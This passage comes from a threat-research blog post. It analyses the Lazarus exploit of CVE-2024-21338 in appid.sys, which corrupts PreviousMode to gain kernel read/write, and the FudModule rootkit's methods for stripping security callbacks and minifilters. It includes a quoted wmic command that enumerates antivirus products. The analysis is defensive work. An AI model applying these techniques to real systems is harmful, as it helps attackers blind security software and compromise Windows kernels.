<p>Since user mode would typically not be handling kernel function pointers, this design suggests the IOCTL may have been initially designed to be invoked from the kernel. Indeed, while we did not find any legitimate user-mode callers, the IOCTL does get invoked by other AppLocker drivers. For instance, there is a <code>ZwDeviceIoControlFile</code> call in <code>applockerfltr.sys</code>, passing <code>SmpQueryFile</code> and <code>SmpReadFile</code> for the callback pointers. Aside from that, <code>appid.sys</code> itself also uses this functionality, passing <code>AipQueryFileHandle</code> and <code>AipReadFileHandle</code> (which are basically just wrappers over <code>ZwQueryInformationFile</code> and <code>ZwReadFile</code>, respectively). </p>
<p>Despite this design, the vulnerable IOCTL remained accessible from user space, meaning that a user-space attacker could abuse it to essentially trick the kernel into calling an arbitrary pointer. What’s more, the attacker also partially controlled the data referenced by the first argument passed to the invoked callback function. This presented an ideal exploitation scenario, allowing the attacker to call an arbitrary kernel function with a high degree of control over the first argument. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="390" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-1024x390.png" alt="" class="wp-image-8197" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-1024x390.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-300x114.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-768x292.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered.png 1172w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">A WinDbg session with the triggered vulnerability, traced to the arbitrary callback invocation. Note that the attacker controls both the function pointer to be called (<code>0xdeadbeefdeadbeef</code> in this session) and the data pointed to by the first argument (<code>0xbaadf00dbaadf00d</code>). </figcaption></figure></div>
<p>If exploitation sounds trivial, note that there are some constraints on what pointers this vulnerability allows an attacker to call. Of course, in the presence of <a href="https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/" target="_blank" rel="noreferrer noopener">SMEP</a> (Supervisor Mode Execution Prevention), the attacker cannot just supply a user-mode shellcode pointer. What’s more, the callback invocation is an indirect call that may be safeguarded by <a href="https://learn.microsoft.com/en-us/windows/win32/secbp/control-flow-guard" target="_blank" rel="noreferrer noopener">kCFG</a> (Kernel Control Flow Guard), requiring that the supplied kernel pointers represent valid kCFG call targets. In practice, this does not prevent exploitation, as the attacker can just find some kCFG-compliant gadget function that would turn this into another primitive, such as a (limited) read/write. There are also a few other constraints on the IOCTL input buffer that must be solved in order to reach the vulnerable callback invocation. However, these too are relatively straightforward to satisfy, as the attacker only needs to fake some kernel objects and supply the right values so that the IOCTL handler passes all the necessary checks while at the same time not crashing the kernel. </p>
<p>The vulnerable IOCTL is exposed through a device object named <code>\Device\AppId</code>. <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/defining-i-o-control-codes" target="_blank" rel="noreferrer noopener">Breaking down</a> the <code>0x22A018</code> control code and extracting the <code>RequiredAccess</code> field reveals that a handle with write access is required to call it. Inspecting the device’s ACL (Access Control List; see the screenshot below), there are entries for <code>local service</code>, <code>administrators</code>, and <code>appidsvc</code>. While the entry for <code>administrators</code> does not grant write access, the entry for <code>local service</code> does. Therefore, to describe CVE-2024-21338 more accurately, we should label it <em>local service-to-kernel</em> rather than <em>admin-to-kernel</em>. It’s also noteworthy that <code>appid.sys</code> might create two additional device objects, namely <code>\Device\AppidEDPPlugin</code> and <code>\Device\SrpDevice</code>. Although these come with more permissive ACLs, the vulnerable IOCTL handler is unreachable through them, rendering them irrelevant for exploitation purposes. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1019" height="476" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl.png" alt="" class="wp-image-8198" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl.png 1019w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl-768x359.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /><figcaption class="wp-element-caption">Access control entries of <code>\Device\AppId</code>, revealing that while <code>local service</code> is allowed write access, <code>administrators</code> are not. </figcaption></figure></div>
<p>As the <a href="https://learn.microsoft.com/en-us/windows/win32/services/localservice-account" target="_blank" rel="noreferrer noopener">local service</a> account has reduced privileges compared to administrators, this also gives the vulnerability a somewhat higher impact than standard admin-to-kernel. This might be the reason Microsoft characterized the CVE as <code>Privileges Required: Low</code>, taking into account that <code>local service</code> processes do not always necessarily have to run at higher integrity levels. However, for the purposes of this blog, we still chose to refer to CVE-2024-21338 mainly as an admin-to-kernel vulnerability because we find it better reflects how it was used in the wild – Lazarus was already running with elevated privileges and then impersonated the local service account just prior to calling the IOCTL. </p>
<p>The vulnerability was introduced in Win10 1703 (RS2/15063) when the <code>0x22A018</code> IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. As for the later versions, the vulnerability extended all the way up to the most recent builds, including Win11 23H2. There have been some slight changes to the IOCTL, including an extra argument expected in the input buffer, but nothing that would prevent exploitation.  </p>
<p>We developed a custom PoC (Proof of Concept) exploit and submitted it in August 2023 as part of a vulnerability report to Microsoft, leading to an advisory for <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a> in the February Patch Tuesday update. The update addressed the vulnerability by adding an <code>ExGetPreviousMode</code> check to the IOCTL handler (see the patch below). This aims to prevent user-mode initiated IOCTLs from triggering the arbitrary callbacks. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="332" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-1024x332.png" alt="" class="wp-image-8199" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-1024x332.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-300x97.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-768x249.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1.png 1260w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The patched IOCTL handler. If feature <code>2959575357</code> is enabled, attempts to call the IOCTL with <code>PreviousMode==UserMode</code> should immediately result in <code>STATUS_INVALID_DEVICE_REQUEST</code>, failing to even reach <code>AipSmartHashImageFile</code>. </figcaption></figure></div>
<p>Though the vulnerability may only barely meet Microsoft’s security servicing criteria, we believe patching was the right choice and would like to thank Microsoft for eventually addressing this issue. Patching will undoubtedly disrupt Lazarus’ offensive operations, forcing them to either find a new admin-to-kernel zero-day or revert to using BYOVD techniques. While discovering an admin-to-kernel zero-day may not be as challenging as discovering a zero-day in a more attractive attack surface (such as standard user-to-kernel, or even sandbox-to-kernel), we believe that finding one would still require Lazarus to invest significant resources, potentially diverting their focus from attacking some other unfortunate targets. </p>
<h4 class="wp-block-heading">Exploitation </h4>
<p>The Lazarus exploit begins with an initialization stage, which performs a one-time setup for both the exploit and the rootkit (both have been compiled into the same module). This initialization starts by dynamically resolving all necessary Windows API functions, followed by a low-effort anti-debug check on <code>PEB.BeingDebugged</code>. Then, the exploit inspects the build number to see if it’s running on a supported Windows version. If so, it loads hardcoded constants tailored to the current build. Interestingly, the choice of constants sometimes comes down to the update build revision (UBR), showcasing a high degree of dedication towards ensuring that the code runs cleanly across a wide range of target machines.  </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="763" height="482" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets.png" alt="" class="wp-image-8201" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets.png 763w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets-300x190.png 300w" sizes="(max-width: 763px) 100vw, 763px" /><figcaption class="wp-element-caption">A decompiled code snippet, loading version-specific hardcoded constants. This particular example contains offsets and syscall numbers for Win10 1809. </figcaption></figure></div>
<p>The initialization process then continues with leaking the base addresses of three kernel modules: <code>ntoskrnl</code>, <code>netio</code>, and <code>fltmgr</code>. This is achieved by calling <code>NtQuerySystemInformation</code> using the <code>SystemModuleInformation</code> class. The <code>KTHREAD</code> address of the currently executing thread is also leaked in a similar fashion, by duplicating the current thread pseudohandle and then finding the corresponding kernel object address using the <code>SystemExtendedHandleInformation</code> system information class. Finally, the exploit manually loads the <code>ntoskrnl</code> image into the user address space, only to scan for relative virtual addresses (RVAs) of some functions of interest. </p>
<p>Since the <code>appid.sys</code> driver does not have to be already loaded on the target machine, the exploit may first have to load it itself. It chooses to accomplish this in an indirect way, by writing an event to one specific AppLocker-related ETW (Event Tracing for Windows) provider. Once <code>appid.sys</code> is loaded, the exploit impersonates the <code>local service</code> account using a direct syscall to <code>NtSetInformationThread</code> with the <code>ThreadImpersonationToken</code> thread information class. By impersonating <code>local service</code>, it can now obtain a read/write handle to <code>\Device\AppId</code>. With this handle, the exploit finally prepares the IOCTL input buffer and triggers the vulnerability using the <code>NtDeviceIoControlFile</code> syscall.  </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="511" height="913" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall.png" alt="" class="wp-image-8202" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall.png 511w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall-168x300.png 168w" sizes="(max-width: 511px) 100vw, 511px" /><figcaption class="wp-element-caption">Direct syscalls are heavily used throughout the exploit. </figcaption></figure></div>
<p>The exploit crafts the IOCTL input buffer in such a way that the vulnerable callback is essentially a gadget that performs a 64-bit copy from the IOCTL input buffer to an arbitrary target address. This address was chosen to corrupt the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode" target="_blank" rel="noreferrer noopener">PreviousMode</a> of the current thread. By ensuring the corresponding source byte in the IOCTL input buffer is zero, the copy will clear the <code>PreviousMode</code> field, effectively resulting in its value being interpreted as <code>KernelMode</code>. Targeting <code>PreviousMode</code> like this is a widely popular <a href="https://research.nccgroup.com/2020/05/25/cve-2018-8611-exploiting-windows-ktm-part-5-5-vulnerability-detection-and-a-better-read-write-primitive/#previousmode-abuse:~:text=into%20PreviousMode%20further.-,PreviousMode%20%E2%80%93%20a%20%22god%20mode%22%20primitive%3F,-PreviousMode%20on%2064" target="_blank" rel="noreferrer noopener">exploitation technique</a>, as corrupting this one byte in the <code>KTHREAD</code> structure bypasses kernel-mode checks inside syscalls such as <code>NtReadVirtualMemory</code> or <code>NtWriteVirtualMemory</code>, allowing a user-mode attacker to read and write arbitrary kernel memory. Note that while this technique was <a href="https://x.com/GabrielLandau/status/1597001955909697536" target="_blank" rel="noreferrer noopener">mitigated</a> on some Windows Insider Builds, this mitigation has yet to reach general availability at the time of writing. </p>
<p>Interestingly, the exploit may attempt to trigger the vulnerable IOCTL twice. This is due to an extra argument that was added in Win11 22H2. As a result, the IOCTL handler on newer builds expects the input buffer to be <code>0x20</code> bytes in size while, previously, the expected size was only <code>0x18</code>. Rather than selecting the proper input buffer size for the current build, the exploit just tries calling the IOCTL twice: first with an input buffer size <code>0x18</code> then – if not successful – with <code>0x20</code>. This is a valid approach since the IOCTL handler’s first action is to check the input buffer size, and if it doesn’t match the expected size, it would just immediately return <code>STATUS_INVALID_PARAMETER</code>.  </p>
<p>To check if it was successful, the exploit employs the <code>NtWriteVirtualMemory</code> syscall, attempting to read the current thread’s <code>PreviousMode</code> (Lazarus avoids using <code>NtReadVirtualMemory</code>, more on this later). If the exploit succeeded, the syscall should return <code>STATUS_SUCCESS</code>, and the leaked <code>PreviousMode</code> byte should equal <code>0</code> (meaning <code>KernelMode</code>). Otherwise, the syscall should return an error status code, as it should be impossible to read kernel memory without a corrupted <code>PreviousMode</code>.  </p>
<p>In our exploit analysis, we deliberately chose to omit some key details, such as the choice of the callback gadget function. This decision was made to strike the right balance between helping defenders with detection but not making exploitation too widely accessible. For those requiring more information for defensive purposes, we may be able to share additional details on a case-by-case basis. </p>
<h2 class="wp-block-heading">The FudModule Rootkit</h2>
<p>The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s <code>PreviousMode</code>. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the <code>Nt(Read|Write)VirtualMemory</code> syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It’s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.  </p>
<p>The first variants of the FudModule rootkit were independently discovered by AhnLab and ESET research teams, with both publishing detailed analyses in September 2022. The rootkit was named after the <code>FudModule.dll</code> string used as the name in its export table. While this artifact is not present anymore, there is no doubt that what we found is an updated version of the same rootkit. AhnLab’s <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">report</a> documented a sample from early 2022, which incorporated seven data-only rootkit techniques and was enabled through a BYOVD exploit for <a href="https://www.virustotal.com/gui/file/175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" target="_blank" rel="noreferrer noopener">ene.sys</a>. ESET’s <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">report</a> examined a slightly earlier variant from late 2021, also featuring seven rootkit techniques but exploiting a different BYOVD vulnerability in <a href="https://www.virustotal.com/gui/file/0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5/detection" target="_blank" rel="noreferrer noopener">dbutil_2_3.sys</a>. In contrast, our discovery concerns a sample featuring nine rootkit techniques and exploiting a previously unknown admin-to-kernel vulnerability. Out of these nine techniques, four are new, three are improved, and two remain unchanged from the previous variants. This leaves two of the original seven techniques, which have been deprecated and are no longer present in the latest variant. </p>
<p>Each rootkit technique is assigned a bit, ranging from <code>0x1</code> to <code>0x200</code> (the <code>0x20</code> bit is left unused in the current variant). FudModule executes the techniques sequentially, in an ascending order of the assigned bits. The bits are used to report on the success of the individual techniques. During execution, FudModule will construct an integer value (named <code>bitfield_techniques</code> in the decompilation below), where only the bits corresponding to successfully executed techniques will be set. This integer is ultimately written to a file named <code>tem1245.tmp</code>, reporting on the rootkit’s success. Interestingly, we did not find this filename referenced in any other Lazarus sample, suggesting the dropped file is only inspected through hands-on-keyboard activity, presumably through a RAT (Remote Access Trojan) command. This supports our beliefs that FudModule is only loosely integrated into the rest of Lazarus’ malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="779" height="704" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main.png" alt="" class="wp-image-8203" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main-300x271.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main-768x694.png 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption class="wp-element-caption">The rootkit’s “main” function, executing the individual rootkit techniques. Note the missing <code>0x20</code> technique. </figcaption></figure></div>
<p>Based on the large number of updates, it seems that FudModule remains under active development. The latest variant appears more robust, avoiding some potentially problematic practices from the earlier variants. Since some techniques target undocumented kernel internals in a way that we have not previously encountered, we believe that Lazarus must be conducting their own kernel research. Further, though the rootkit is certainly technically sophisticated, we still identified a few bugs here and there. These may either limit the rootkit’s intended functionality or even cause kernel bug checks under the right conditions. While we find some of these bugs very interesting and would love to share the details, we do not enjoy the idea of providing free bug reports to threat actors, so we will hold onto them for now and potentially share some information later if the bugs get fixed. </p>
<p>Interestingly, FudModule utilizes the <code>NtWriteVirtualMemory</code> syscall for both reading and writing kernel memory, eliminating the need to call <code>NtReadVirtualMemory</code>. This leverages the property that, when limited to a single virtual address space, <code>NtReadVirtualMemory</code> and <code>NtWriteVirtualMemory</code> are basically inverse operations with respect to the values of the source <code>Buffer</code> and the destination <code>BaseAddress</code> <a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html" target="_blank" rel="noreferrer noopener">arguments</a>. In other words, writing to kernel memory can be thought of as writing from a user-mode <code>Buffer</code> to a kernel-mode <code>BaseAddress</code>, while reading from kernel memory could be conversely achieved by swapping arguments, that is writing from a kernel-mode <code>Buffer</code> to a user-mode <code>BaseAddress</code>. Lazarus’ implementation takes advantage of this, which seems to be an intentional design decision since most developers would likely prefer the more straightforward way of using <code>NtReadVirtualMemory</code> for reading kernel memory and <code>NtWriteVirtualMemory</code> for writing kernel memory. We can only guess why Lazarus chose this approach, but this might be yet another stealth-enhancing feature. With their implementation, they only must use one suspicious syscall instead of two, potentially reducing the number detection opportunities. </p>
<h6 class="wp-block-heading"><strong>Debug Prints</strong> </h6>
<p>Before we delve into the actual rootkit techniques, there is one last thing worth discussing. To our initial surprise, Lazarus left a handful of plaintext debug prints in the compiled code. Such prints are typically one of the best things that can happen to a malware researcher, because they tend to accelerate the reverse engineering process significantly. In this instance, however, some of the prints had the opposite effect, sometimes even making us question if we understood the code correctly.  </p>
<p>As an example, let us mention the string <code>get rop function addresses failed</code>. Assuming <em>rop</em> stands for <em>return-oriented programming</em>, this string would make perfect sense in the context of exploitation, if not for the fact that not a single return address was corrupted in the exploit.  </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="984" height="148" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines.png" alt="" class="wp-image-8204" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines.png 984w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines-300x45.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines-768x116.png 768w" sizes="(max-width: 984px) 100vw, 984px" /><figcaption class="wp-element-caption">Plaintext debug strings found in the rootkit. The term <em>vaccine</em> is used to refer to security software. </figcaption></figure></div>
<p>While written in English, the debug strings suggest their authors are not native speakers, occasionally even pointing to their supposed Korean origin. This is best seen on the frequent usage of the term <em>vaccine</em> throughout the rootkit. This had us scratching our heads at first, because it was unclear how vaccines would relate to the rootkit functionality. However, it soon became apparent that the term was used to <a href="https://medium.com/s2wblog/detailed-analysis-of-darkgate-investigating-new-top-trend-backdoor-malware-0545ecf5f606#:~:text=use%20are%20different.-,Vaccine%20Detection,-DarkGate%20detects%20installed" target="_blank" rel="noreferrer noopener">refer</a> to security software. This might originate from a common Korean <a href="https://translate.google.com/?sl=en&tl=ko&text=antivirus&op=translate" target="_blank" rel="noreferrer noopener">translation</a> of <em>antivirus</em> (바이러스 백신), a compound word with the literal meaning <em>virus vaccine</em>. Note that even North Korea’s “own” antivirus was called <a href="https://research.checkpoint.com/2018/silivaccine-a-look-inside-north-koreas-anti-virus/" target="_blank" rel="noreferrer noopener">SiliVaccine</a>, and to the best of our knowledge, the term <em>vaccine</em> would not be used like this in other languages such as Japanese. Additionally, this is not the first time Korean-speaking threat actors have used this term. For instance, AhnLab’s recent <a href="https://asec.ahnlab.com/en/59387/" target="_blank" rel="noreferrer noopener">report</a> on Kimsuky mentions the following telltale command: <br> <br><code>cmd.exe /U /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt</code></p>
<p>Another puzzle is the abbreviation <code>pvmode</code>, which we believe refers to <code>PreviousMode</code>. A Google search for <code>pvmode</code> yields exactly zero relevant results, and we suspect most English speakers would choose different abbreviations, such as <code>prvmode</code> or <code>prevmode</code>. However, after consulting this with language experts, we learned that using the abbreviation <code>pvmode</code> would be unusual for Korean speakers too. </p>
<p>Finally, there is also the debug message <code>disableV3Protection passed</code>. Judging from the context, the rather generic term <em>V3</em> here refers to <em>AhnLab V3 Endpoint Security</em>. Considering the geopolitical situation, North Korean hacker groups are likely well-acquainted with South Korean AhnLab, so it would make perfect sense that they internally refer to them using such a non-specific shorthand. </p>
<h4 class="wp-block-heading" id="techniques">0x01 – Registry Callbacks </h4>
<p>The first rootkit technique is designed to address <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/filtering-registry-calls" target="_blank" rel="noreferrer noopener">registry callbacks.</a> This is a documented Windows mechanism which allows security solutions to monitor registry operations. A security solution’s kernel-mode component can call the <code>CmRegisterCallbackEx</code> routine to register a callback, which gets notified whenever a registry operation is performed on the system. What’s more, since the callback is invoked synchronously, before (or after) the actual operation is performed, the callback can even block or modify forbidden/malicious operations. FudModule’s goal here is to remove existing registry callbacks and thus disrupt security solutions that rely on this mechanism. </p>
<p>The callback removal itself is performed by directly modifying some internal data structures managed by the kernel. This was also the case in the previous version, as documented by <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">ESET</a> and <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">AhnLab</a>. There, the rootkit found the address of <code>nt!CallbackListHead</code> (which contains a doubly linked, circular list of all existing registry callbacks) and simply emptied it by pointing it to itself. </p>
<p>In the current version of FudModule, this technique was improved to leave some selected callbacks behind, perhaps making the rootkit stealthier. This updated version starts the same as the previous one: by finding the address of <code>nt!CallbackListHead</code>. This is done by resolving <code>CmUnRegisterCallback</code> (this resolution is performed by name, through iterating over the export table of <code>ntoskrnl</code> in memory), scanning its function body for the <code>lea rcx,[nt!CallbackListHead]</code> instruction, and then calculating the final address from the offset extracted from the instruction’s opcodes. </p>
<p>With the <code>nt!CallbackListHead</code> address, FudModule can iterate over the registry callback linked list. It inspects each entry and determines if the callback routine is implemented in <code>ntoskrnl.exe</code>, <code>applockerfltr.sys</code>, or <code>bfs.sys</code>. If it is, the callback is left untouched. Otherwise, the rootkit replaces the callback routine pointer with a pointer to <code>ObIsKernelHandle</code> and then proceeds to unlink the callback entry. </p>
<h4 class="wp-block-heading">0x02 – Object Callbacks </h4>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks" target="_blank" rel="noreferrer noopener">Object callbacks</a> allow drivers to execute custom code in response to thread, process, and desktop handle operations. They are often used in self-defense, as they represent a convenient way to protect critical processes from being tampered with. Since the protection is enforced at the kernel level, this should protect even against elevated attackers, as long as they stay in user mode. Alternatively, object callbacks are also useful for monitoring and detecting suspicious activity.  </p>
<p>Whatever the use case, object callbacks can be set up using the <code>ObRegisterCallbacks</code> routine. FudModule naturally attempts to do the exact opposite: that is to remove all registered object callbacks. This could let it bypass self-defense mechanisms and evade object callback-based detection/telemetry. </p>
<p>The implementation of this rootkit technique has stayed the same since the previous version, so there is no need to go into too much detail. First, the rootkit scans the body of the <code>ObGetObjectType</code> routine to obtain the address of <code>nt!ObTypeIndexTable</code>. This contains an array of pointers to <code>_OBJECT_TYPE</code> structures, each of which represents a distinct object type, such as <code>Process</code>, <code>Token</code>, or <code>SymbolicLink</code>. FudModule iterates over this array (skipping the first two special-meaning elements) and inspects each <code>_OBJECT_TYPE.CallbackList</code>, which contains a doubly linked list of object callbacks registered for the particular object type. The rootkit then empties the <code>CallbackList</code> by making each node’s forward and backward pointer point to itself. </p>
<h4 class="wp-block-heading">0x04 – Process, Thread, and Image Kernel Callbacks </h4>
<p>This next rootkit technique is designed to disable three more types of kernel callbacks: <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine" target="_blank" rel="noreferrer noopener">process</a>, <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine" target="_blank" rel="noreferrer noopener">thread</a>, and <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine" target="_blank" rel="noreferrer noopener">image</a> callbacks. As their names suggest, these are used to execute custom kernel code whenever a new process is created, a new thread spawned, or a new image loaded (e.g. a DLL loaded into a process). These callbacks are extremely useful for detecting malicious activity. For instance, process callbacks allow AVs and EDRs to perform various checks on each new process that is to be created. Registering these callbacks is very straightforward. All that is needed is to pass the new callback routine as an argument to <code>PsSetCreateProcessNotifyRoutine</code>, <code>PsSetCreateThreadNotifyRoutine</code>, or <code>PsSetLoadImageNotifyRoutine</code>. These routines also come in their updated <code>Ex</code> variants, or even <code>Ex2</code> in the case of <code>PsSetCreateProcessNotifyRoutineEx2</code>. </p>
<p>Process, thread, and image callbacks are managed by the kernel in an almost identical way, which allows FudModule to use essentially the same code to disable all three of them. We find that this code has not changed much since the previous version, with the main difference being new additions to the list of drivers whose callbacks are left untouched.  </p>
<p>FudModule first finds the addresses of <code>nt!PspNotifyEnableMask</code>, <code>nt!PspLoadImageNotifyRoutine</code>, <code>nt!PspCreateThreadNotifyRoutine</code>, and <code>nt!PspCreateProcessNotifyRoutine</code>. These are once again obtained by scanning the code of exported routines, with the exact scanning method subject to some variation based on the Windows build number. Before any modification is performed, the rootkit clears <code>nt!PspNotifyEnableMask</code> and sleeps for a brief amount of time. This mask contains a bit field of currently enabled callback types, so clearing it disables all callbacks. While some EDR bypasses would <a href="https://overlayhack.com/edr-bypass-evasion" target="_blank" rel="noreferrer noopener">stop here</a>, FudModule’s goal is not to disable all callbacks indiscriminately, so the modification of <code>nt!PspNotifyEnableMask</code> is only temporary, and FudModule eventually restores it back to its original value. We believe the idea behind this temporary modification is to decrease the chance of a race condition that could potentially result in a bug check. </p>
<p>All three of the above <code>nt!Psp(LoadImage|CreateThread|CreateProcess)NotifyRoutine</code> globals are organized as an array of <code>_EX_FAST_REF</code> pointers to <code>_EX_CALLBACK_ROUTINE_BLOCK</code> structures (at least that’s the name used in <a href="https://github.com/reactos/reactos/blob/e0c17c3f462e3b62bf0c4ca2479c1e5c6b8ff496/sdk/include/ndk/extypes.h#L535" target="_blank" rel="noreferrer noopener">ReactOS,</a> Microsoft does not share a symbol name here). FudModule iterates over all these structures and checks if <code>_EX_CALLBACK_ROUTINE_BLOCK.Function</code> (the actual callback routine pointer) is implemented in one of the below-whitelisted modules. If it is, the pointer will get appended to a new array that will be used to replace the original one. This effectively removes all callbacks except for those implemented in one of the below-listed modules. </p>
<figure class="wp-block-table"><table><tbody><tr><td><code>ntoskrnl.exe </code></td><td><code>ahcache.sys </code></td><td><code>mmcss.sys </code></td><td><code>cng.sys </code></td></tr><tr><td><code>ksecdd.sys </code></td><td><code>tcpip.sys </code></td><td><code>iorate.sys </code></td><td><code>ci.dll </code></td></tr><tr><td><code>dxgkrnl.sys </code></td><td><code>peauth.sys </code></td><td><code>wtd.sys</code></td><td></td></tr></tbody></table><figcaption class="wp-element-caption">Kernel modules that are allowed during the removal of process, thread, and image callbacks. </figcaption></figure>
<h4 class="wp-block-heading">0x08 – Minifilter Drivers </h4>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts" target="_blank" rel="noreferrer noopener">File system minifilters</a> provide a mechanism for drivers to intercept file system operations. They are used in a wide range of scenarios, including encryption, compression, replication, monitoring, antivirus scanning, or file system virtualization. For instance, an encryption minifilter would encrypt the data before it is written to the storage device and, conversely, decrypt the data after it is read. FudModule is trying to get rid of all the monitoring and antivirus minifilters while leaving the rest untouched (after all, some minifilters are crucial to keep the system running). The choice about which minifilters to keep and which to remove is based mainly on the minifilter’s altitude, an integer value that is used to decide the processing order in case there are multiple minifilters attached to the same operation. Microsoft defines <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers" target="_blank" rel="noreferrer noopener">altitude ranges</a> that should be followed by well-behaved minifilters. Unfortunately, these ranges also represent a very convenient way for FudModule to distinguish anti-malware minifilters from the rest. </p>
<p>In its previous version, FudModule disabled minifilters by directly patching their filter functions’ prologues. This would be considered very unusual today, with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard" target="_blank" rel="noreferrer noopener">HVCI</a> (Hypervisor-Protected Code Integrity) becoming more prevalent, even turned on by default on Windows 11. Since HVCI is a security feature designed to prevent the execution of arbitrary code in the kernel, it would stand in the way of FudModule trying to patch the filter function. This forced Lazarus to completely reimplement this rootkit technique, so the current version of FudModule disables file system minifilters in a brand-new data-only attack. </p>
